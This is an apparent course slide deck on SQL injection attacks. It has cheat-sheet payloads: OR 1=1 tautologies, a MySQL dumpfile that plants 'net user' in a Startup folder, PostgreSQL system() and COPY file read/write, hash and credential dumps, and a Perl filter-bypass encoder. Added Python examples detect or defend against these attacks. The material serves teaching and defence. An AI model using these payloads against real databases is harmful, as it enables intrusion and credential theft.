  • 4. Structured Query Language (SQL) SQL was originally developed at IBM in early 1970. Formalized until 1986 by American National Standards Institute (ANSI). We using the SQL standard defined by the International Organization for Standardization (ISO). 2/04/2011 CHAPTER 10 4
  • 5. SQL Queries SQL queries are made up of one or more SQL statements that are effectively instructions for the database server to carry out. it may include a conditional clause to target specific rows in a table(WHERE). The OR and AND operators are used when multiple conditions are to be evaluated. SELECT Statement SELECT * FROM tblUsers ; SELECT * INTO hackerTable FROM tblusers UNION Operator SELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins; SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins 2/04/2011 CHAPTER 10 5
  • 6. SQL Queries (CON..) INSERT Statement INSERT IN TO tblUsers VALUES (5,'john','smith',0); INSERT INTO tblUsers(id, username, password, priv) VALUES (5, 'john','smith',0); UPDATE Statement UPDATE tblUsers SET priv=0 WHERE username = 'sarah‘; DELETE Statement DELETE FROM tblUsers WHERE username = 'admin‘; 2/04/2011 CHAPTER 10 6
  • 7. SQL Queries (CON..) Notes from the Underground… SELECT story FROM news WHERE id=19; SELECT story FROM news WHERE id=19 OR 1=1 ; SELECT story FROM news WHERE id=19 OR 1=2 ; UPDATE tblUsers SET password='letmein' WHEREemailaddress='someuser@victim.com‘; UPDATE tblUsers SET password='letmein' WHERE emailaddress=‘ ’ or 1=1’ ; 2/04/2011 CHAPTER 10 7
  • 8. SQL Queries (CON..) DROP Statement DROP TABLE tblusers; CREATE TABLE Statement CREATE TABLE shoppinglist(item int, name varchar(100)); CREATE TABLE shoppinglist as select * from dba_users; ORDER BY Clause SELECT cost, product FROM orders ORDER BY cost DESC; 2/04/2011 CHAPTER 10 8
  • 9. SQL Queries (CON..) ALTER TABLE Statement ALTER TABLE tblUsers ADD comments varchar(100); ALTER TABLE tblUsers DROP COLUMN comments; ALTER TABLE tblUsers ALTER COLUMN comments varchar(500); GROUP BY Statement SELECT customer,SUM(cost) FROM orders WHERE customer = 'Anthony Anteater‘ GROUP BY customer; 2/04/2011 CHAPTER 10 9
  • 10. SQL Queries (CON..) Limiting the Result Set 2/04/2011 10 CHAPTER 10
  • 11. SQL Injection Quick Reference 2/04/2011 11 CHAPTER 10
  • 12. SQL Injection Quick Reference most common SQL queries and techniques we will need when exploiting an SQL injection vulnerability identify the database platform. SQL injection cheat sheet 2/04/2011 12 CHAPTER 10
  • 13. Identifying the Database Platform Web server platform and scripting language. IIS + ASP.NET => SQLServer . APACHE + PHP => MySQL . …. Etc. But we need more scientific approach …… 2/04/2011 13 CHAPTER 10
  • 14. Identifying the Database Platform Time Delay Inference is a long-standing method of identifying the database platform. OR .. submitting “heavy queries” designed to consume the processor for a measureable length of time. 2/04/2011 14 CHAPTER 10
  • 15.
  • 16. identify the database For example … if we suspect that the database platform is either Microsoft SQL Server or Oracle ‘ AND ‘ ahmed’ || ‘ali’ = ‘ahmedali’-- ‘ AND ‘ahmed’ + ‘ali’ = ‘ahmedali’-- 2/04/2011 16 CHAPTER 10
  • 17. Combining Multiple Rows only one column and one row can be returned at a time. To bypass this restriction it is possible to concatenate all rows and columns into a single string. 2/04/2011 17 CHAPTER 10
  • 18.
  • 19. Combining Multiple Rows SELECT sys.stragg (distinct username||';') FROM all_users; -- Returns all usernames on a single line 2/04/2011 19 CHAPTER 10
  • 20. Cheat sheets a quick reference of common SQL statements used in SQL injection attacks against ORACLE and MySQL. 2/04/2011 20 CHAPTER 10
  • 21. Cheat Sheet PHP and Ruby on Rails applications. Configuration Information and Schema 2/04/2011 21 CHAPTER 10
  • 22. Cheat Sheet 2/04/2011 22 CHAPTER 10
  • 23. Attacking the Database Server System Command Execution It is possible to execute operating system commands by creating a malicious script file on the target server SELECT 'system_commands' INTO dumpfiletrojanpath SELECT 'net user x x ' into dumpfile 'c:Documents and SettingsAll UsersStart MenuPrograms Startupattack.bat' 2/04/2011 23 CHAPTER 10
  • 24. Cracking Database Passwords extract user password hashes from the mysql.user table. SELECT concat(user,":",password) FROM mysql.user Password hashes can then be cracked using http://hashcrack.com/ www.openwall.com/john/ Attacking the Database Server 2/04/2011 24 CHAPTER 10
  • 25. Attacking the Database Directly execute code by directly connecting to the MySQL server and creating a user-defined function. we can download a tool to perform this attack Windows: ww.scoobygang.org/HiDDenWarez/mexec.pl Windows:www.0xdeadbeef.info/exploits/raptor_winudf.tgz Attacking the Database Server 2/04/2011 25 CHAPTER 10
  • 26. File Read/Write The MySQL LOAD_FILE function returns a string containing the contents of a specified file. The database user requires the file_priv privilege to invoke this function. SELECT LOAD_FILE('/etc/passwd'); - we can use a tool called SqlDumper to read file contents via blind SQL injection. Attacking the Database Server 2/04/2011 26 CHAPTER 10
  • 27. Cheat Sheet 2/04/2011 27 CHAPTER 10
  • 28. Cheat Sheet 2/04/2011 28 CHAPTER 10
  • 29. Cheat Sheet 2/04/2011 29 CHAPTER 10
  • 30. Attacking the Database Server there are two different types of injection in ORACLE traditional SQL injection only a single SQL statement. PL/SQL injection execute entire PL/SQL blocks. 2/04/2011 30 CHAPTER 10
  • 31. More than 100 Oracle tables contain password information. Sometimes the passwords are available as clear text. Cracking Database Passwords 2/04/2011 31 CHAPTER 10
  • 32. select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials; Cracking Database Passwords 2/04/2011 32 CHAPTER 10
  • 33. select credential_set_column, sysman.decrypt (credential_value) from sysman.mgmt_credentials2; 2/04/2011 CHAPTER 10 33 Cracking Database Passwords
  • 34. Oracle password hashes can then be cracked using a variety of freely available tools, such as Woraauthbf. John the Ripper. Gsauditor. Checkpwd. Cain & Abel. 2/04/2011 CHAPTER 10 34 Cracking Database Passwords
  • 35. Bypassing Input Validation Filters
  • 36. Bypassing Input Validation Filters: You can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input. Quote Filters: The single-quote character (') is synonymous with SQL injection attacks. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data.
  • 37. Quote Filters (con…): SELECT 'ABC'
  • 38. Quote Filters (con…): Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it. In the following example the query SELECT 'ABC' is placed into a variable via a HEX-encoded string: DECLARE @q varchar(8000) SELECT @q=0x53454c454354202741424327 EXEC(@q) You can use the following Perl script to automatically encode SQL statements using this technique:
  • 39. Quote Filters (con…)
  #!/usr/bin/perl
  print "Enter SQL query to encode:";
  $teststr = <STDIN>; chomp $teststr;
  $hardcoded_sql = 'declare @q varchar(8000) ' .
                   'select @q=0x*** ' .
                   'exec(@q)';
  $prepared = encode_sql($teststr);
  # substitute the hex string for the *** placeholder
  $hardcoded_sql =~ s/\*\*\*/$prepared/g;
  print "[*]-Encoded SQL:\n";
  print $hardcoded_sql . "\n";
  sub encode_sql {
      my ($sqlstr) = @_;
      my $encoded_command = '';
      # emit each byte of the query as two hex digits
      foreach my $byte (unpack("C*", $sqlstr)) {
          $encoded_command .= sprintf('%02x', $byte);
      }
      return $encoded_command;
  }
  • 40. HTTP Encoding: You can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting).
  • 41. HTTP Encoding (con…)
  • 42. HTTP Encoding (con…)
  • 43. Troubleshooting SQL Injection Attacks
  • 44. Troubleshooting SQL Injection Attacks: The table lists some of the common challenges and errors that are frequently encountered when attempting to exploit an SQL injection flaw across various platforms.
  • 50. SQL Injection on Other Platforms
  • 51. SQL Injection on Other Platforms. This section is intended to provide a quick reference for other, less common platforms, such as PostgreSQL, DB2, Informix, and Ingres. PostgreSQL: Extracting the PostgreSQL Database Configuration Information:
  • 52. Extracting the PostgreSQL Database Schema:
  • 53. Blind SQL Injection Function. Attacking the Database Server: PostgreSQL. PostgreSQL does not offer a built-in procedure for executing operating system commands, but it is possible to import functions such as system() from an external .dll or shared object (.so) file. System Command Execution: import the system function from the standard UNIX libc library: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT; The system function can then be called by executing the following SQL query: SELECT system('command');
  • 54. Local File Access: Local files can be read by the superuser account using the following SQL: CREATE TABLE filedata(t text); COPY filedata FROM '/etc/passwd'; -- It is also possible to write local files using the following SQL: CREATE TABLE thefile(evildata text); INSERT INTO thefile(evildata) VALUES ('some evil data'); COPY thefile (evildata) TO '/tmp/evilscript.sh'; Cracking Database Passwords: PostgreSQL passwords are hashed using the MD5 algorithm: select usename||':'||passwd from pg_shadow;
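  The MySQL file-read and hash-dump queries on slides 24 and 26 and the PostgreSQL UDF, COPY and pg_shadow queries on slides 53 and 54 all leave a distinctive footprint in database statement logging. The following scanner is an added example, not code from the book or the slides: it runs a handful of regex rules over constructed sample log lines that approximate PostgreSQL's log_statement output and MySQL's general query log (the lines are made up for the demo and are not from any real system).

```python
import re

# Constructed sample log lines (not taken from any real system): PostgreSQL
# log_statement=all style entries, then MySQL general-log style entries.
SAMPLE_LOG = """\
2011-04-02 10:01:05 UTC LOG:  statement: SELECT story FROM news WHERE id=19
2011-04-02 10:01:09 UTC LOG:  statement: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT;
2011-04-02 10:01:12 UTC LOG:  statement: COPY filedata FROM '/etc/passwd';
2011-04-02 10:01:15 UTC LOG:  statement: select usename||':'||passwd from pg_shadow;
110402 10:02:01     12 Query  SELECT LOAD_FILE('/etc/passwd')
110402 10:02:03     12 Query  SELECT concat(user,":",password) FROM mysql.user
110402 10:02:05     12 Query  SELECT name FROM products WHERE id=7
"""

# Each rule is named after the slide technique it flags; all are case-insensitive.
RULES = [
    ("pg_c_function_from_library",
     re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?C'?(?!\w)", re.I)),
    ("pg_copy_to_or_from_file", re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+'", re.I)),
    ("pg_shadow_hash_read", re.compile(r"\bpg_shadow\b", re.I)),
    ("mysql_load_file", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("mysql_user_hash_read", re.compile(r"\bmysql\.user\b", re.I)),
]

def scan_log(log_text: str) -> list:
    """Return (line_number, rule_name) for every log line that matches a rule.
    A COPY from STDIN (the normal bulk-load path) carries no quoted path and is
    deliberately not flagged."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

if __name__ == "__main__":
    for lineno, name in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {name}")
```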
  • 55. DB2 Cheat Sheet: The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application. Extracting the DB2 Database Configuration Information:
  • 56. Extracting DB2 Database Schema: Blind SQL Injection Function:
  • 57. Informix Cheat Sheet: The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms. Extracting the Informix Database Configuration Information:
  • 58. Extracting Informix Database Schema: Blind SQL Injection Function:
  • 59. Ingres Cheat Sheet: The Ingres database is an open source database available for all major operating systems. Ingres is one of the least popular databases to find integrated with a Web application. Extracting the Ingres Database Configuration Information:
  • 60. Extracting Ingres Database Schema: Blind SQL Injection Function:
  • 61. Microsoft Access: Microsoft Access databases do not scale well with enterprise applications, and therefore are usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access, which you can find here: www.insomniasec.com/publications/Access-Through-Access.pdf
  • 62. Resources: SQL Injection White Papers
  ■ “Advanced SQL Injection” by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt
  ■ “Advanced SQL Injection in SQL Server Applications” by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf
  ■ “Buffer Truncation Abuse in .NET and Microsoft SQL Server” by Gary O’Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf
  ■ “Access through Access” by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf
  ■ “Time-Based Blind SQL Injection with Heavy Queries” by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx
  SQL Injection Cheat Sheets
  ■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/
  ■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/
  ■ Ferruh Mavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  ■ Ferruh Mavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
  • 63. SQL Injection Exploit Tools: BSQL Hacker is a relatively new player in the SQL injection exploit world. The tool is a Windows-based GUI application that supports Microsoft SQL Server, Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injection techniques: http://labs.portcullis.co.uk/application/bsql-hacker/ The Sec-1 Automagic SQL Injection (SASI) tool is a Microsoft SQL Server exploit tool written in Perl: http://scanner.sec-1.com/resources/sasi.zip
  • 64. Password Cracking Tools : Cain & Abel: www.oxid.it Woraauthbf: www.soonerorlater.hu/index.khtml?article_id=513
  • 65. Solutions Fast Track: Structured Query Language (SQL) Primer. SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL statements are SELECT, INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included in the WHERE clause portion of a SELECT statement. The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements.

Editor's Notes

  1. This will be valid for most database platforms. Where necessary I will highlight platform-specific variations to the standard.
  2. The primary role of the SELECT statement is to retrieve data from a database and return it to the application or user. Microsoft SQL Server also allows you to use SELECT statements to read table data from one table and insert it into another. You use the UNION operator to combine the result sets of two or more SELECT statements. All SELECT statements within the union must return the same number of columns and their data types must be compatible. To permit duplicates and prevent the database from comparing the returned data, use UNION ALL SELECT.
  3. Use the INSERT statement to insert data into a table. The most significant problem with this approach is that if the table structure is changed (e.g., columns are added or deleted) data could be written to the wrong column. Use the UPDATE statement to modify existing data within a database table. All UPDATE statements should include a WHERE clause to indicate which rows should be updated, or all rows are affected. Use the DELETE statement to delete rows from a table. All DELETE statements should include a WHERE clause to indicate which rows should be deleted.
  4. Use the DROP statement to delete database objects such as tables, views, indexes, and users. Use the CREATE TABLE statement to create a new table in the current database or schema. INTEGER or INT: a 32-bit signed integer value. Oracle allows you to create a table and populate it with data from another table or view. Use the ORDER BY clause to sort the results of a SELECT statement by a specific column.
  5. You can use the ALTER TABLE statement to add, delete, or modify a column within an existing table. Use the GROUP BY statement when performing an aggregate function such as SUM against a column in a table.
  6. When performing SQL injection attacks you will often need to limit the number of table rows returned by your injected query (e.g., when extracting data via error messages). The syntax for selecting a specific row from a table varies among database platforms. The table details the SQL syntax for selecting the first and fifth rows from the tblUsers table.
  7. Mohammed Siddig continues.
  8. The single-quote character is often filtered or doubled up as a defense mechanism. This strategy fails when the vulnerable user input is a numeric value, and therefore is not delimited using quote characters.
  9. The DUAL dummy table (as it is sometimes called) is an automatically generated table assigned to SYS, but accessible to all users. It is useful because it always exists and has a single row, which is handy for SELECT statements with constant expressions. You could just as easily do this with any other table with a single row, but using DUAL makes it portable among all Oracle installations. Example: SELECT 1+1 FROM DUAL; returns:
     1+1
     ----------
     2
  10. In the following example, we have created a variable named @q and placed the query SELECT 'ABC' into it via a HEX-encoded string.
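  The quote-filter discussion on slides 36 to 39 and in notes 8 and 10 makes two points that are easiest to see side by side: a blacklist that looks for the quote character never sees the quote inside the 0x53454c454354202741424327 literal, and doubling quotes does nothing when the injected value sits in a numeric context such as id=19. The following Python is an added example, not code from the book or the slides; the SQLite news table and its three rows are constructed for the demo, and the parameterised lookup at the end is the fix that holds in both cases.

```python
import sqlite3

# Constructed demo data: the news table behind the slides' id=19 examples.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE news(id INTEGER, story TEXT);
INSERT INTO news VALUES (18, 'yesterday'), (19, 'today'), (20, 'draft');
""")

def blacklist_filter(value: str) -> bool:
    """Naive filter: accept the input only if it contains no single quote."""
    return "'" not in value

def double_quotes(value: str) -> str:
    """Quote-doubling escape; it only matters when the value sits inside quotes."""
    return value.replace("'", "''")

def decode_hex_literal(literal: str) -> str:
    """Decode a SQL Server 0x... literal (slide 38) back to the text it carries."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("ascii")

def vulnerable_lookup(id_value: str) -> list:
    """Numeric context built by string concatenation: the escaper is applied,
    but the attacker needs no quote to change the WHERE clause (note 8)."""
    sql = "SELECT story FROM news WHERE id=" + double_quotes(id_value)
    return [row[0] for row in CONN.execute(sql)]

def safe_lookup(id_value: str) -> list:
    """Type-check the input and bind it as a parameter, so it is never parsed as SQL."""
    try:
        news_id = int(id_value)
    except ValueError:
        return []
    rows = CONN.execute("SELECT story FROM news WHERE id=?", (news_id,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    print(decode_hex_literal("0x53454c454354202741424327"))  # the quotes the filter never saw
    print(vulnerable_lookup("19 OR 1=1"))                     # every story, despite escaping
    print(safe_lookup("19 OR 1=1"))                           # nothing: input is not an id
```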
  11. This can be done by encoding your input using exotic encoding standards or via double encoding.
  12. The table lists common SQL metacharacters in a number of encoded formats.
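  Slides 40 to 42 and notes 11 and 12 describe filters defeated by double encoding and exotic encodings. The defensive counterpart is to canonicalize a parameter before checking it: decode repeatedly until the value stops changing. The following Python is an added example, not code from the book or the slides; it handles standard %XX escapes plus the IIS-style %uXXXX form, and the short metacharacter list is a constructed, deliberately partial blacklist used only to show the difference.

```python
import re
from urllib.parse import unquote

# Constructed, deliberately partial blacklist of SQL metacharacter fragments.
SQL_METACHARS = ("'", '"', ";", "--", "/*", "*/")

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode %XX and %uXXXX escapes repeatedly until the value stops changing,
    so a double-encoded %2527 ends up as the single quote it stands for.
    max_rounds bounds the loop so pathological input cannot spin it."""
    for _ in range(max_rounds):
        decoded = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        decoded = unquote(decoded)
        if decoded == value:
            return value
        value = decoded
    return value

def naive_check(value: str) -> bool:
    """Filter applied to the raw parameter: encoded metacharacters sail through."""
    return not any(fragment in value for fragment in SQL_METACHARS)

def canonical_check(value: str) -> bool:
    """The same blacklist applied after canonicalization."""
    return naive_check(canonicalize(value))

if __name__ == "__main__":
    for raw in ("%27", "%2527", "%u0027", "19%20OR%201%3D1"):
        print(raw, "->", repr(canonicalize(raw)),
              "naive:", naive_check(raw), "canonical:", canonical_check(raw))
```

  Note the last case: even after canonicalization, a blacklist passes 19 OR 1=1 because numeric injection needs no metacharacter, which is why canonicalization is a detection aid and parameterised queries remain the actual fix.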
  13. Omer Salih continues.